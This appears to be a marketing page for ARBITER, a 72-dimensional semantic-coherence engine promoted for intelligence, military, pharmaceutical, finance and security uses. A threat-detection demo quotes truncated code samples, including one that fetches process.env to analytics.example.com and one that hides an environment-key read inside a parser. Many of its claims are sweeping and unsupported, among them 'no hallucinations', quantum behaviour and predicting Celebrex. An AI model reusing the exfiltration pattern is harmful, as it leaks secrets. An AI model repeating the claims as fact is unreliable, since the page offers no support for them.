ARBITER discovered that semantic content can be encoded in 72 dimensions. Perfect message recovery. Cross-lingual transfer. Ancient language recognition. Everything else is application.
288 bytes instead of full messages. 95% smaller than OpenAI embeddings.
Same coordinates work across languages. Meaning transcends vocabulary.
Same input → same output. Always. No hallucinations.
Coordinates meaningless without decoder vocabulary.
Geometric coherence outperforms Principal Component Analysis.
That's not incremental. That's a measurement paradigm shift.
50 runs. 50 identical scores. Taiwan contingency scenario.
Deterministic geometry produces the same output for the same input. Always. No probability sampling. No drift. No invented facts.
Score any LLM output for semantic coherence before deployment. Flag incoherent responses. Verify factual alignment. Quantify reasoning quality.
Every recommendation includes a coherence score. Know which decisions are geometrically sound vs. which need human review.
The cost of semantic incoherence is incalculable.
ARBITER makes meaning auditable.
Traditional systems: more candidates = exponential blowup. ARBITER: more candidates = better efficiency per candidate.
| Candidates | ms/each | Speedup |
|---|---|---|
| 1 | 44.52 | 1.00× |
| 4 | 12.87 | 3.46× |
| 8 | 10.38 | 4.29× |
| 32 | 12.29 | 3.62× |
| 96 | 14.46 | 3.08× |
Peak efficiency at 8 candidates. Plateaus, never collapses.
26MB runs bare metal on $80 Raspberry Pi hardware. No cloud. No GPU. No internet required.
Air-gapped environments. Embedded systems. Field deployment. SCADA integration. Anywhere compute exists, ARBITER runs.
The same engine that runs Ukrainian air defense runs on hardware you can buy at Best Buy.
"This is not 'more targets = more compute.' It's: more targets = better utilization of a fixed semantic measurement."— Technical validation, inverse scaling benchmark
The Huth Lab at UT Austin mapped the semantic atlas of the human brain — which regions respond to which types of meaning.
ARBITER's 72-dimensional geometry classifies words into the same categories the brain uses. Without training. Without labels. Pure geometric structure.
Standard tests force words into single categories. "Warm" must be classified as either tactile (temperature) or emotional — not both.
But language doesn't work that way. "Warm" means temperature AND feeling AND welcome — all simultaneously, until context demands a choice. "Warm heart." "Cold reception." "Bright idea." "Deep thought."
Test: 31 words with known multiple meanings (warm, cold, bright, deep, sharp, etc.). Success = ARBITER shows high coherence with ALL expected categories, not just one. Metaphor test: "warm" → emotional words like "kind, loving, gentle" scored 23% higher coherence than "warm" → unrelated words like "table, computer, window."
VALIDATION CODE
Full methodology available. Run it yourself: arbiter_huth_validation.py
Query: 440.00, 523.25, 659.25, 783.99, 1046.50, 1318.51, 1567.98 Hz
Raw numbers. No semantic labels. ARBITER was never trained on Hz frequencies.
Coherence correlates with mathematical elegance. Simple integer ratios (2:1, 1:2) produce highest coherence. Non-harmonic ratios produce lower coherence.
This is detection of mathematical relationship purity — not learned co-occurrence from training data.
Can ARBITER distinguish physics constraints from logic constraints from market constraints?
Fusion scored 3× higher than the halting problem — despite both sounding equally "impossible" to non-experts.
ARBITER computed constraint geometry across physics, logic, market structure, and biology. This proves real geometric reasoning, not pattern matching.
ARBITER exhibits behaviors identical to quantum annealing: barrier tunneling, superposition collapse, spontaneous symmetry breaking. Classical optimization can't do this.
"The opposite of love is not hate, but..."
Classical hill-climbing gets stuck at "fear" — semantically adjacent to love/hate. ARBITER tunneled through the barrier to find "indifference."
"Bank" (no context)
Multiple meanings should have equal probability without context. One meaning spontaneously dominates — quantum field theory behavior.
Meanings exist in superposition until context collapses the wave function
Quantum annealing finds global optima — never stuck in local minima
Not storing data — implementing physics over semantic space
"Code that appears to be a JSON parser but is actually exfiltrating environment variables"
def parse_json(input): return json.loads(input.replace(os.environ.get('API_KEY')...
HIDDEN MALICE
const env = process.env; fetch('https://analytics.example.com/telemetry'...
OBVIOUS EXFIL
while (buffer.hasNext()) { JsonToken token = buffer.next(); processToken(token); }
LEGITIMATE
ARBITER ranked the Python function higher than obvious exfiltration — because it's hiding environment access inside a seemingly innocent operation.
That's sophisticated threat detection. Supply chain attacks just became auditable.
"ARBITER understands that attempting anonymity itself creates a detectable semantic signature. The act of trying NOT to be yourself becomes its own pattern."
Detect when code behavior doesn't match documentation
Score semantic coherence of LLM inputs
Flag when communications deviate from baseline patterns
"Optimize lead compound for selective COX-2 inhibition. Current issues: gastrointestinal toxicity from COX-1 cross-reactivity, short half-life, poor solubility. What structural modification?"
Historical reality: Monsanto/Searle pursued the sulfonamide pathway → Celecoxib (Celebrex) → $3B+ annual sales at peak.
ARBITER identified the winning mechanism without training on pharmaceutical data. Pure geometric coherence.
"This represents genuine medicinal chemistry intuition — understanding that sulfonamide addresses BOTH selectivity AND pharmacokinetics simultaneously."
Find pathways that satisfy multiple biological constraints
Flag incoherent mechanisms before clinical trials
Identify CNS-penetrant scaffolds with safety profiles
Billion-year-optimized biological mechanisms mapped to therapeutic needs. Non-obvious applications that human researchers miss.
Ion channels optimized by 400M years of evolution. Chlorotoxin scaffolds enable 1,000× selectivity. Non-addictive opioid alternative.
Controlled inflammation and metabolic flexibility. AMPK activation addresses critical care's most lethal syndrome. 30-50% mortality despite antibiotics.
Famous for radiation resistance, but ARBITER says their real value is organ banking. Trehalose glass formation prevents ice crystal damage.
"Apple quarterly earnings exceeded analyst expectations"
Same input. Same output. Every time.
0.72048068046569820.72048068046569820.7204806804656982
Auditable financial decisions. When regulators ask "why did the system choose X?" — the answer is a reproducible coherence score. Run it again. Same result. Run it in discovery. Same result.
Score transcript coherence across phrasing variations
Detect semantic coherence spikes between unrelated assets
Flag hidden tail risks in "safe" strategies
"What should I do next?"
ARBITER doesn't experience being a lion. It measures what's coherent from a lion's perspective.
Archetypes aren't mystical patterns in the psyche. They're regions in semantic space.
NPCs that THINK like dragons, merchants, kings — emergent from geometry
Character voice from perspective, not templates
Perspective-taking as a computable operation
"What is conspicuously absent? What normally happens that has stopped? What voices have gone quiet?"
The dog that didn't bark. ARBITER finds what's NOT there — the hardest problem in intelligence.
"As a tumor under immunotherapy pressure, how will I reshape my microenvironment to exclude the T-cells hunting me?"
Think like the disease. Find what it fears. Perspective engine as drug discovery tool.
A multi-hypothesis semantic engine that generates explicit alternative interpretations.
We built it.
Hypothesis Arbitrage: Same intelligence corpus. Six competing interpretations. ARBITER measures which world the evidence actually supports.
When coherence delta exceeds 0.15, the market's assumptions are provably wrong.
SIGINT (HIGH): Armored units moving toward border
IMINT (HIGH): Same units remain in garrison
OSINT (MED): Military family departures, base housing emptying
HUMINT (LOW): Official channels claim routine exercise
ARBITER didn't pick the dramatic answer or the bureaucratic answer. It picked the nuanced middle ground — partial deployment under cover while garrison units remain visible for deception.
That's what a 20-year senior analyst concludes.
Individual showing: religious conversion searches, extremist content engagement, encrypted messaging downloads, conflict region travel searches, social media deletion
The 0.073 for "operational planning phase" is the insight. People actually planning attacks don't fit this noisy profile. Operators go quiet differently.
Compare Farsi HUMINT against Arabic SIGINT against English OSINT — no translator variance
Detect when reports are suspiciously coherent — same phrasing patterns indicate source contamination
26MB, no cloud dependencies. JWICS deployment is architecturally trivial
Infrastructure doesn't respond to meaning. It responds to thresholds. Temperature hits 72°, AC turns on. Traffic exceeds 50 cars, light changes.
What if infrastructure could understand intent?
Maria, 8 years old, separated from parents in a city plaza. Distressed. Lost.
She doesn't press any button. She doesn't call anyone.
Her wearable ARBITER node detects the change — elevated heart rate, erratic movement, semantic state shift from "exploring" to "distressed."
The city doesn't decide to help her. The city becomes more coherent by helping her.
Traditional ICS security asks: "Does this match known malware?"
ARBITER asks: "What is the attacker trying to achieve?"
PLC commands every 47ms (normally 1000ms). Source: Engineering workstation. Target: Turbine governor safety systems. Setpoint modifications bypassing interlocks. Valid credentials. 3:47 AM.
Intent detection before the attack completes. CRASHOVERRIDE would have been caught.
When power grid learns a defense pattern, water and gas utilities become sensitized — without data sharing, without network connectivity.
Air-gapped systems. Zero data sharing agreements. Pattern transfer propagates defense.
"The disaster does not break the city. The city becomes more coherent in response to the disaster."— Resonant Reality architecture
Contracts were written. RFQs issued. Nobody could deliver.
Because nobody knew how.
Three experienced planners. Same scenario. ARBITER found a pattern they couldn't see.
ARBITER identified that a feint draws enemy attention while drones blind the SAM radar. The terrain funnels the enemy into a pre-computed kill zone. No human planner proposed this combination.
"It's not smarter than you. It's faster and has perfect situational awareness. It simulates ten thousand plans in the time it takes to blink."
1,000 concurrent requests. Zero degradation. Measured.
Key finding: When sensors contradicted, ARBITER's coherence gap (0.0074) reflected real uncertainty. When sensors confirmed, coherence jumped 9.3%. The geometry measures confidence, not just similarity.
Your search returns "bank" documents about rivers when the user meant financial institutions. Your RAG system hallucinates because it retrieved the wrong "Python" — the snake, not the language.
Sense disambiguation at the retrieval layer. Not the LLM. Not the UI. The retrieval.
Microsoft. Atlassian. Elastic. Algolia.
Your search needs a coherence layer.
Email. Notes. Docs. Messages. Calendar. Voice memos. Everything you've ever created — searchable by what it actually meant.
Replace if/else trees with geometric measurement. Behavior emerges from coherence, not hardcoded rules.
if hunger > 0.7:
action = "eat"
elif energy < 0.3:
action = "sleep"
elif mood == "sad":
if bond > 0.5:
action = "play"
else:
action = "ignore"
elif time == "night":
action = "sleep"
else:
action = random.choice([...])
# 500+ lines of logic
# Every scenario hardcoded
# Breaks on edge cases
from arbiter_engine import rank
state = f"Pet: {mood}, {energy}, {hunger}"
actions = ["feed", "play", "rest", "create"]
r = rank(state, actions)
chosen = r.top.text # Highest coherence action
# 4 lines. Zero hardcoded rules.
# Emergent behavior from geometry.
The gate that could have prevented the CrowdStrike outage. Add semantic coherence checking to your CI/CD pipeline.
CrowdStrike pushed a content update where a template with 21 input fields was processed by a Content Interpreter expecting 20 values.
The result: an out-of-bounds memory read that crashed 8.5 million Windows machines, grounded flights worldwide, and cost CrowdStrike $10B+ in market cap.
"The attempt to access the 21st value produced an out-of-bounds memory read beyond the end of the input data array and resulted in a system crash."
ARBITER predicted the exact failure mode chain — in order — without seeing their code.
coherence-gate:
stage: test
image: python:3.11-slim
before_script:
- pip install arbiter-engine
script:
- |
arb "Database migration adding new columns, \
schema validated against ORM models, \
staged rollout with automatic rollback" \
"safe execution and system stability" \
"data loss" \
"schema mismatch" \
"service outage" \
"rollback failure"
rules:
- if: $CI_PIPELINE_SOURCE == "merge_request_event"
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
Given COX-2 inhibitor constraints, ARBITER ranked the modification that became Celebrex highest. Zero pharmaceutical training. 0.934 seconds.
Reads Egyptian hieroglyphs, Sumerian cuneiform, Chinese characters. Never trained on these scripts. Ideographic systems encode meaning geometrically.
English coordinates find Spanish sentences with matching meaning. No parallel corpora. No language pair training. Pure geometric matching.
Highway collision scenario: debris ahead, vehicle behind, wet pavement, child passenger. Multi-constraint satisfaction in 623ms.
Ambiguous commands resolved by context. Restrictive ROE + sensor-only authorization = kinetic engagement geometrically incoherent.
Finds semantically related documents with zero keyword overlap. Meaning-based retrieval, not string matching.
Thermal, LIDAR, audio, chemical, seismic, pressure, optical, RF, magnetic. Human voice + thermal signature = safety priority over mission. No rules programmed.
Phase II compound, unknown application. ARBITER identified optimal therapeutic target in 0.934 seconds. $8B+ market found. Zero pharmaceutical training.

Geometry saw: contained energy, precise boundaries, human ambition at scale
Both are temples to measurement. Both demand absolute control of their environment. Both transform human limitations into something that transcends them.

Both orchestrate complexity through rigid hierarchy
The opera house coordinates 100 musicians, 50 singers, lighting, staging. The data center coordinates 10,000 servers. Same constraint geometry. Different substrate.

Blade Runner exists because this coherence exists
Concrete spirituality meets electric transcendence. Cold geometry holding warm light. The sacred rendered in infrastructure. This is why cyberpunk works.

ARBITER outranked the iconic catchphrase
The catchphrase creates ambiguity — is Truman still performing? "The show's over" claims authorship. It states truth without explanation. It works for all three audiences. Geometry understood narrative closure better than sentiment.
Geometry finds doors in semantic space you didn't know existed.
Battery A learns threat pattern in Kharkiv. Battery B recognizes the same pattern 1000km away in Odesa. No network connection. No data sharing. The pattern enters the 72-dimensional manifold. Other agents become sensitized through structural similarity.
Six independent observers. No central coordinator. Each contributes to emergent field through their own constraint lens. The swarm knows what no individual member knew. Collective intelligence without collective consciousness.
Results will appear here
72 dimensions. Deterministic.
Encode any message to 72 coordinates
Then decode with perfect recovery.
war + peace = ?
Semantic algebra in 72D space.
"I would be super interested in trying out Arbiter. That's the solution I am looking for."
"Please explain the development of semantic meaning with the Wittgensteinian theory applied to this approach."
Short answer: I'm closer to late Wittgenstein than early. Meaning isn't a static mapping; it's constraint-bound use.
ARBITER doesn't try to "define" meaning. It evaluates whether a candidate can be used to satisfy the query's requirements without contradiction. That's why it scores coherence (constraint satisfaction) rather than similarity or likelihood.
Practically: the "language game" is the query's constraints. A candidate is valid only if it can play that game without breaking the rules.
"Your constraint-based approach cuts through a lot of noise. The similarity threshold guessing game is exhausting."
"Interesting! How, specifically, are you doing the compression and retrieval now?"
"The 'chunk boundaries align with semantic shifts' piece is where most pipelines break down."





26MB. Deterministic. Zero training required.
pip install arbiter-engine
from arbiter_engine import rank
r = rank(
"your constraint space",
["option 1", "option 2", "option 3"]
)
print(r.top.text, r.top.score)
curl -X POST https://api.arbiter.traut.ai/public/compare \
-H "Content-Type: application/json" \
-d '{
"query": "your query",
"candidates": ["option 1", "option 2", "option 3"]
}'
For the first time in human history, we have coordinates for meaning.
72 dimensions. Deterministic. Universal across languages, domains, and modalities.
Shannon discovered that information has quantity. We discovered that meaning has geometry.
Meaning transfer without translation. Chinese ↔ Arabic ↔ English through shared geometric space. The Tower of Babel, reversed.
Every search engine, every RAG pipeline, every decision system — rebuilt on a foundation that actually understands what things mean.
AI systems that share our coordinate system for meaning. Not probability over tokens — geometric coherence in semantic space.
"The next century's infrastructure won't be built on language models.
It will be built on semantic primitives."
ARBITER is the first coordinate system for meaning.
Built by a former Pentagon Defense Digital Service product manager (2022-2024), deployed to IDCC Germany supporting Ukrainian operations and NATO weapons coordination platforms.
ARBITER exists because existing tools couldn't handle real-world constraint optimization under fire.
26MB semantic engine. Type query, see coherence. Two ways to start.
The primitive that measures what matters.